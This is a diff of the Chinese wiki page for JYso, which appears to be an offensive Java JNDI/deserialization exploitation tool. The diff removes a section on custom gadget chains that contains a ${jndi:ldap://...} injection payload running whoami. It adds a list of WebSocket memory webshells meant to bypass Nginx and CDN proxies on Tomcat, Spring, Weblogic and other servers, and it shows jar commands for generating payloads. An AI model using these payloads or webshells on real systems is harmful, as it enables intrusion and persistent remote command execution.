mirror of
https://github.com/qi4L/JYso.git
synced 2026-09-24 07:41:52 +08:00
Updated JYso‐CN (markdown)
+13
-22
@@ -30,8 +30,6 @@ java -jar JYso-[version].jar --jndi -i 127.0.0.1
|
||||
java -jar JYso-[version].jar --jndi -i 127.0.0.1 -u "dc=ex" -p "123456"
|
||||
```
|
||||
|
||||
|
||||
|
||||
+ 对于BCEL这种超长请求,可以从http处取参,来减少请求长度
|
||||
|
||||
先发http请求参数,在发jndi payload
|
||||
@@ -453,6 +451,10 @@ WF :Write File - 通过 FileOutputStream.write() 来写入文件,使用命
|
||||
}}
|
||||
```
|
||||
|
||||
* 效果图
|
||||
|
||||

|
||||
|
||||
---
|
||||
对于Gadget:
|
||||
|
||||
@@ -629,28 +631,10 @@ BC :BCEL Classloader - 通过 ..bcel...ClassLoader.loadClass().newInstance()
|
||||
| linux<br />windows | winlinux | sun.awt.X11.AwtGraphicsConfigData<br />sun.awt.windows.WButtonPeer | windows/linux版本判断 |
|
||||
| | all | | 全部检测 |
|
||||
|
||||
## 🐳自定义
|
||||
|
||||
+ 自定义链子
|
||||
* 效果图
|
||||
|
||||
在 `com.qi4l.jndi.gadgets` 下新建JAVA文件,并实现接口 ObjectPayload 后在 getObject 方法中编写链子逻辑即可。
|
||||
使用
|
||||
|
||||
```
|
||||
{{url
|
||||
(${jndi:ldap://0.0.0.0:1389/Deserialization/自定义链子的类名/command/Base64/{{base64
|
||||
(whoami)
|
||||
}}})
|
||||
}}
|
||||
```
|
||||
|
||||
+ 自定义内存马
|
||||
|
||||
在 `com.qi4l.jndi.template` 下新建 JAVA 文件并将主要实现方法写在静态代码块中。
|
||||
|
||||
额外方法与 shell 通过 javassist 引入 `com.qi4l.jndi.template.shell.MemShellPayloads`(最小化有效负载的大小)
|
||||
|
||||
使用与上面内存马使用一致
|
||||

|
||||
|
||||
---
|
||||
|
||||
@@ -836,6 +820,13 @@ java -jar JYso-[version].jar -yso 1 -g [payload] -p '[command]'
|
||||
- `EX-MS-TWSMSFromThread` : `CMD` 命令回显 WebSocket 内存马
|
||||
- `EX-MS-TEXMSFromThread` : `CMD` 命令回显 Executor 内存马
|
||||
- `EX-MS-TUGMSFromJMXuP` : `CMD` 命令回显 Upgrade 内存马
|
||||
- `EX-cmsMSBYNC`: 绕过Nginx、CDN代理限制的 WebSocket 马,路径`/x`
|
||||
- `EX-proxyMSBYNC`: 绕过Nginx、CDN代理限制的 WebSocket 马,路径`/x`
|
||||
- `EX-WsResin`: 适配 Resin 的 WebSocket 马,请求头中`Upgrade: websocket`
|
||||
- `EX-MsTSJser`: 适配Tomcat、Spring、Jetty的 WebSocket 马,路径`/cmd`
|
||||
- `EX-MsTSJproxy`: 适配Tomcat、Spring、Jetty的 WebSocket 马,路径`/proxy`
|
||||
- `EX-WsWeblogic`: 适配 Weblogic 的 WebSocket 马,路径`/path`
|
||||
- `EX-WSWebsphereProxy`: 适配 Websphere 的 WebSocket 马,路径`/path`
|
||||
|
||||
对于一些非常规的环境,本项目还提供了基于 Java 原生的 RMI 内存马及命令回显方式,通过向 RMI 注册中心绑定一个恶意类,可以随时调用执行命令并回显,使用方法例子如下:
|
||||
|
||||
|
||||
Reference in New Issue
Block a user